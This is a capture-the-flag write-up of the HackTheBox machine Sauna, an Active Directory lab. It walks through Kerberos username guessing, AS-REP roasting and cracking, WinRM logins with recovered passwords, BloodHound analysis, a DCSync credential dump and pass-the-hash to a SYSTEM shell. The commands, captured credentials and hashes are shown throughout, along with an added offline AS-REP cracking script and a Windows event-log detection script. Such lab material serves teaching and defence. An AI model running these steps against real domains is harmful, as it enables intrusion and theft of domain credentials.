Sauna is a fun and interesting machine from HackTheBox that teaches some basic concepts of red teaming and Active Directory exploitation. The user part presents a fairly realistic attack vector: the employees of a bank are shown on its web page and we have to guess their domain usernames from the full names listed there. The root part represents a common mistake in privilege assignment, where an ordinary user account in the domain has DCSync rights over the domain.


As my default routine I start with an nmap scan to look for interesting results.

[email protected]:~$ nmap -sC -A
Starting Nmap 7.80 ( ) at 2020-07-24 23:26 CEST
Nmap scan report for
Host is up (0.079s latency).
Not shown: 988 filtered ports
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-07-25 04:30:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h03m17s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-07-25T04:32:56
|_  start_date: N/A

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 326.61 seconds

The set of open ports (DNS, Kerberos on 88, LDAP on 389/636 plus the global catalog on 3268/3269, SMB and kpasswd on 464) makes it clear that we are dealing with an Active Directory domain controller for EGOTISTICAL-BANK.LOCAL. Besides that, there is an HTTP site on port 80 where we may find information needed for the usual exploitation steps. Two details in the scan are worth keeping in mind: nmap reports a clock skew of about 7 hours between my machine and the DC, and since the KDC rejects Kerberos requests whose timestamp is more than a few minutes off, any Kerberos tooling that fails with a KRB_AP_ERR_SKEW error will need the attacking machine's clock synced to the DC first; and SMB message signing is enabled and required, which rules out NTLM relay to SMB on this host.



We are presented with a plain bank website that holds little of interest, except for the About Us section:


The names of the employees are shown under each of their pictures. I saved the names for later use, thinking they would be useful, and searched for the username formats most commonly used in AD environments, which turned up this:


As the forum reply above explains, the most common format is the first letter of the first name followed by the last name (e.g. Fergus Smith = fsmith). Following that convention, I generated usernames from the names on the site and saved them to a file.
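To avoid betting everything on one naming convention, here is a small generator that turns each full name into the common AD username formats at once, so that a single AS-REP roasting pass with -usersfile can test all of them. This is an added example, not a script from the write-up: "Fergus Smith" is the example name used above, the other two names are constructed placeholders, and the set of formats is my own assumption about what organisations commonly use, not something the page establishes.

```python
import re
import unicodedata
from pathlib import Path
from typing import Iterable, List, Optional


def normalize(token: str) -> str:
    """Lowercase, strip accents and drop anything that is not a-z/0-9 (O'Brien-Lee -> obrienlee)."""
    ascii_form = unicodedata.normalize("NFKD", token).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", ascii_form.lower())


def gen_usernames(full_name: str) -> List[str]:
    """Candidate usernames for one person, most common format first; middle names are ignored."""
    parts = [p for p in (normalize(t) for t in full_name.split()) if p]
    if len(parts) < 2:
        return parts                      # single-token name: nothing to combine
    first, last = parts[0], parts[-1]
    f, l = first[0], last[0]
    candidates = [
        f + last,                         # fsmith (the format guessed in the write-up)
        first + "." + last,               # fergus.smith
        first + last,                     # fergussmith
        first + "_" + last,               # fergus_smith
        f + "." + last,                   # f.smith
        last + f,                         # smithf
        last + "." + first,               # smith.fergus
        first + l,                        # ferguss
        first,                            # fergus
    ]
    seen, out = set(), []
    for c in candidates:                  # keep order, drop duplicates (e.g. very short names)
        if c not in seen:
            seen.add(c)
            out.append(c)
    return out


def build_userlist(names: Iterable[str], path: Optional[str] = None) -> List[str]:
    """Flatten candidates for all names into one de-duplicated list, optionally written to a file."""
    users = list(dict.fromkeys(u for n in names for u in gen_usernames(n)))
    if path:
        Path(path).write_text("\n".join(users) + "\n")
    return users


# Constructed input: only "Fergus Smith" comes from the write-up, the other two are placeholders.
SAMPLE_NAMES = ["Fergus Smith", "Mary Ann Doe", "Seán O'Brien-Lee"]

if __name__ == "__main__":
    print("\n".join(build_userlist(SAMPLE_NAMES)))
```

Feeding nine candidates per person instead of one costs nothing, since every name that does not exist simply comes back as KDC_ERR_C_PRINCIPAL_UNKNOWN.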

Next, since this is presented as an easy box, we can try AS-REP roasting against the generated usernames with Impacket's GetNPUsers.py and see whether any of them hit. The script sends an AS-REQ without pre-authentication for each name; an account with "Do not require Kerberos preauthentication" set gets an AS-REP back whose encrypted part is keyed from the user's password and can therefore be cracked offline. (Despite the heading people often give this step, it is not Kerberoasting, which targets service tickets of accounts that have an SPN.)

[email protected]:/usr/share/doc/python3-impacket/examples$ python3 EGOTISTICAL-BANK.LOCAL/ -no-pass -request -usersfile /home/alt/userlist-sauna.txt -dc-ip
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[email protected]:04df0f9e2335fe90b76c55592d51ca6c$bfe1299b17d8402cd72f883eb7d44b5a7db37df877747193d74b932493bcc630519793f08561c8ecc99bcc919acad3ad8765451757711f69426da93f5841019d4091154dbe3cc75b937d92c5848a673204cc433d40808ed8e978519124dbc649c025c6c2825f0e823d585b9287f82ff801883407b275030c358a7d7cf863dbc60c2170717e4090be13195738bb488a183039327da6666b3d6f4bb41f6acea2056da91989f578ad4b5687138bf9913e7ada84f4d9263b13eb463d99d7b099d01d5bc5d3217c0a0b76a64b6fa9a0809d7990ad5e6f05a25abd063727429088a6e99331008dde7d5ffa515e9ca4f6d2dbf80cd500e4e4c0971db046886d0285f7c6
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[email protected]:/usr/share/doc/python3-impacket/examples$

And there we go: one of the candidate names, fsmith, exists and has pre-authentication disabled, so the KDC handed back an AS-REP that we can attack offline to recover the user's password. The other names returned KDC_ERR_C_PRINCIPAL_UNKNOWN, which means those accounts do not exist in the domain; a name that exists but does require pre-authentication would instead come back with KDC_ERR_PREAUTH_REQUIRED, so the same run doubles as valid-username enumeration.

Let's save the hash to a file and crack it with john (--format=krb5asrep) or hashcat (-m 18200) against a wordlist to recover the plaintext password:


Password Cracked : Thestrokes23
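To make clear what john or hashcat are actually doing with that hash, here is an added example (not code from the write-up) that re-implements the offline check for an RC4-HMAC (etype 23) AS-REP. The Kerberos key for that encryption type is just the NT hash of the password (MD4 over UTF-16LE, no salt), so for each wordlist candidate we derive the key, decrypt the blob and compare the HMAC-MD5 checksum, exactly why a weak password on a no-preauth account is fatal. Because the hash on the page above is truncated, the block constructs its own sample hash for fsmith with a dummy encrypted body and a fixed confounder; the principal, the sample password and the wordlist entries are constructed test data, and the key-usage value 8 for the AS-REP enc-part comes from RFC 4120/4757, not from the page.

```python
import hashlib
import hmac
import struct
from typing import Optional, Tuple

AS_REP_ENC_PART_USAGE = 8  # RFC 4120 key usage number for the AS-REP enc-part (assumption from the RFC)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 only ships MD4 as a 'legacy' algorithm."""
    def rol(x: int, n: int) -> int:
        return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2_idx = [(i % 4) * 4 + i // 4 for i in range(16)]
    r3_idx = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a = rol((a + f(b, c, d) + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rol((a + g(b, c, d) + x[r2_idx[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rol((a + h(b, c, d) + x[r3_idx[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the RC4-HMAC Kerberos key, unsalted."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes) -> Tuple[bytes, bytes]:
    """RFC 4757 RC4-HMAC encryption; returns (checksum, edata) as they sit in the AS-REP."""
    k1 = hmac_md5(key, struct.pack("<I", AS_REP_ENC_PART_USAGE))
    checksum = hmac_md5(k1, confounder + plaintext)
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, confounder + plaintext)


def check_candidate(key: bytes, checksum: bytes, edata: bytes) -> bool:
    """Decrypt with a candidate key and test whether the integrity checksum verifies."""
    k1 = hmac_md5(key, struct.pack("<I", AS_REP_ENC_PART_USAGE))
    k3 = hmac_md5(k1, checksum)
    plaintext = rc4(k3, edata)  # confounder || EncASRepPart if the key is right
    return hmac.compare_digest(hmac_md5(k1, plaintext), checksum)


def parse_asrep_hash(line: str) -> Tuple[str, bytes, bytes]:
    """Split a '$krb5asrep$23$user@REALM:checksum$edata' line (hashcat 18200 / john krb5asrep)."""
    header, blob = line.strip().split(":", 1)
    if not header.startswith("$krb5asrep$23$"):
        raise ValueError("not an RC4-HMAC (etype 23) AS-REP hash")
    checksum_hex, edata_hex = blob.split("$", 1)
    return header[len("$krb5asrep$23$"):], bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def crack_asrep(line: str, wordlist) -> Optional[str]:
    _, checksum, edata = parse_asrep_hash(line)
    for candidate in wordlist:
        if check_candidate(nt_hash(candidate), checksum, edata):
            return candidate
    return None


def make_sample_hash(principal: str, password: str, plaintext: bytes, confounder: bytes) -> str:
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), plaintext, confounder)
    return f"$krb5asrep$23${principal}:{checksum.hex()}${edata.hex()}"


# Constructed sample, NOT the hash from the box: a real enc-part is a DER-encoded EncASRepPart and
# the confounder is random on a KDC; a dummy body and fixed confounder are enough for the check.
SAMPLE_HASH = make_sample_hash("fsmith@EGOTISTICAL-BANK.LOCAL", "Thestrokes23",
                               b"dummy EncASRepPart body", b"\x01\x02\x03\x04\x05\x06\x07\x08")
SAMPLE_WORDLIST = ["password", "Winter2020", "Thestrokes23", "letmein"]

if __name__ == "__main__":
    print(crack_asrep(SAMPLE_HASH, SAMPLE_WORDLIST))
```

The check costs one MD4 and three HMAC-MD5 operations per candidate, which is why hashcat gets through rockyou-sized lists in seconds for this hash type; AES etypes (17/18) are PBKDF2-salted and several orders of magnitude slower to attack.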

Now we can finally try the credentials against WinRM (TCP 5985). That port is not in nmap's default top-1000 list and so does not appear in the scan above; a full-port scan or an explicit -p 5985 confirms it is open, and on a domain controller with WinRM enabled any user in the Remote Management Users group, or with equivalent rights, gets a shell:

[email protected]:~$ evil-winrm -i -u fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> type ../Desktop/user.txt
*Evil-WinRM* PS C:\Users\FSmith\Documents> 

Successfully logged in as expected, and with that I can grab the user flag and start working on moving further inside the machine.

Lateral Movement

After getting a foothold on the machine I ran winPEAS (an enumeration script for Windows privilege escalation) to look for possible paths, since I was not able to find one manually:


Among its output, credentials for another AD user popped up: svc_loanmgr:Moneymakestheworldgoround!

[email protected]:~# evil-winrm -i -u svc_loanmgr -p 'Moneymakestheworldgoround!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload /opt/pentesting/BloodHound/Ingestors/SharpHound.exe
Info: Uploading /opt/pentesting/BloodHound/Ingestors/SharpHound.exe to C:\Users\svc_loanmgr\Documents\SharpHound.exe

Data: 1111380 bytes of 1111380 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> .\SharpHound.exe
Initializing SharpHound at 1:22 PM on 7/11/2020

I was able to log in with the new credentials and, as seen above, ran SharpHound (the BloodHound collector) to find a possible path to Administrator. After the collection was complete I downloaded the resulting archive, imported it into BloodHound on my machine and looked at the relationships between my current account, the domain and the administrative accounts.


Quickly I noticed one edge from my current account (svc_loanmgr) to the domain object: it holds the GetChanges and GetChangesAll extended rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All). Those two rights together are exactly what a domain controller needs to replicate directory data, so any principal that has both can perform a DCSync attack: ask the DC over the DRSUAPI replication protocol for the password data of every account, including krbtgt and Administrator, without ever touching the DC's disk. Note that GetChanges on its own is not enough; the pair is what matters.

I can simply use Impacket's secretsdump.py, which implements the DRSUAPI method, to do that.

[email protected]:~# /usr/share/doc/python3-impacket/examples/ [email protected]
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
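From the defender's side, the three things this box exercised (username guessing through Kerberos, AS-REP roasting and DCSync) each leave a distinct trace in the domain controller's Security log: a burst of 4768 events with status 0x6 for names that do not exist, a 4768 with pre-authentication type 0 for the roastable account, and a 4662 in which a non-DC principal exercises the DS-Replication-Get-Changes* extended rights on the domain object. The detection logic below, run over constructed sample events, is an added example and not part of the write-up; the events themselves, the attacker IP 10.10.14.5, the threshold of 5 failures and the empty allowlist are all assumptions, only the replication-right GUIDs and event IDs are real.

```python
import json
from collections import Counter
from typing import Dict, Iterable, List, Tuple

# Extended rights that, held together, are what a DC needs to replicate: the DCSync signature.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
ENUM_THRESHOLD = 5             # 4768 'client not found' failures from one IP before alerting (assumption)
REPLICATION_ALLOWLIST = set()  # non-DC accounts allowed to replicate, e.g. an Azure AD Connect account

# Constructed sample events as JSON lines, using the EventData field names of the Windows Security log.
# 10.10.14.5 plays the attacker; names other than fsmith and svc_loanmgr are placeholders.
SAMPLE_EVENTS = [
    '{"EventID": 4768, "TargetUserName": "jdoe",   "IpAddress": "10.10.14.5", "Status": "0x6"}',
    '{"EventID": 4768, "TargetUserName": "asmith", "IpAddress": "10.10.14.5", "Status": "0x6"}',
    '{"EventID": 4768, "TargetUserName": "bwhite", "IpAddress": "10.10.14.5", "Status": "0x6"}',
    '{"EventID": 4768, "TargetUserName": "ckhan",  "IpAddress": "10.10.14.5", "Status": "0x6"}',
    '{"EventID": 4768, "TargetUserName": "dlee",   "IpAddress": "10.10.14.5", "Status": "0x6"}',
    '{"EventID": 4768, "TargetUserName": "fsmith", "IpAddress": "10.10.14.5", "Status": "0x0", '
    '"PreAuthType": "0", "TicketEncryptionType": "0x17"}',
    '{"EventID": 4768, "TargetUserName": "svc_loanmgr", "IpAddress": "10.10.10.50", "Status": "0x0", '
    '"PreAuthType": "2", "TicketEncryptionType": "0x12"}',
    '{"EventID": 4768, "TargetUserName": "hsmith", "IpAddress": "10.10.10.50", "Status": "0x6"}',
    '{"EventID": 4662, "SubjectUserName": "SAUNA$", "ObjectType": "domainDNS", '
    '"Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "SubjectUserName": "svc_loanmgr", "ObjectType": "domainDNS", '
    '"Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    '{"EventID": 4662, "SubjectUserName": "svc_loanmgr", "ObjectType": "user", '
    '"Properties": "{00000000-0000-0000-0000-000000000000}"}',   # unrelated property, no alert
]

Alert = Tuple


def parse_events(lines: Iterable[str]) -> List[Dict]:
    return [json.loads(line) for line in lines]


def detect_kerberos_enumeration(events: List[Dict], threshold: int = ENUM_THRESHOLD) -> List[Alert]:
    """Many 4768 with Status 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) from one source = username guessing."""
    failures = Counter(e["IpAddress"] for e in events
                       if e["EventID"] == 4768 and e.get("Status") == "0x6")
    return [("kerberos_user_enumeration", ip, n) for ip, n in failures.items() if n >= threshold]


def detect_asrep_roast(events: List[Dict]) -> List[Alert]:
    """A TGT issued with PreAuthType 0 means the AS-REP went out without pre-auth: roastable.
    TicketEncryptionType 0x17 (RC4) is the cheap-to-crack case and is carried in the alert."""
    return [("asrep_roast", e["TargetUserName"], e["IpAddress"], e.get("TicketEncryptionType"))
            for e in events
            if e["EventID"] == 4768 and e.get("Status") == "0x0" and e.get("PreAuthType") == "0"]


def detect_dcsync(events: List[Dict], allowlist=REPLICATION_ALLOWLIST) -> List[Alert]:
    """4662 exercising replication rights by anything that is not a DC machine account."""
    alerts = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        props = e.get("Properties", "").lower()
        rights = sorted(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)
        subject = e["SubjectUserName"]
        # crude DC test: machine accounts end in '$'; see the note below for a stricter check
        if rights and not subject.endswith("$") and subject not in allowlist:
            alerts.append(("dcsync", subject, rights))
    return alerts


def run_detections(lines: Iterable[str]) -> List[Alert]:
    events = parse_events(lines)
    return detect_kerberos_enumeration(events) + detect_asrep_roast(events) + detect_dcsync(events)


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

The "name ends in $" test is only a first cut: in production compare the subject against the actual DC computer accounts rather than any machine account, and put the accounts that legitimately replicate (Azure AD Connect, some backup products) in the allowlist, otherwise the rule fires on every replication cycle. The 4662 events only exist if "Audit Directory Service Access" is enabled and the domain object carries a SACL for the replication rights, so check that first.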

Gaining System Shell

The rpc_s_access_denied line at the start is expected: secretsdump first tries the remote-registry route to pull the local SAM and LSA secrets, which a low-privileged user cannot do, and then falls back to the DRSUAPI replication method, which is the one that only needs the replication rights. With all of the domain hashes dumped, what I need is the Administrator NT hash: no cracking required, it can be used directly for pass-the-hash against SMB (the -hashes argument takes LM:NT, and since the LM half is ignored by modern Windows the NT hash is simply repeated in both positions) to get a SYSTEM shell on the domain controller and own the domain:

[email protected]:~# /usr/share/doc/python3-impacket/examples/ [email protected] -hashes d9485863c1e9e05851aa40cbb4ab9dff:d9485863c1e9e05851aa40cbb4ab9dff
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file GNRWPFak.exe
[*] Opening SVCManager on
[*] Creating service APMT on
[*] Starting service APMT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

nt authority\system

C:\Windows\system32>type \users\administrator\desktop\root.txt

I am now running as NT AUTHORITY\SYSTEM on the domain controller with the domain Administrator's hash in hand, so I can grab root.txt and mark the machine as owned.
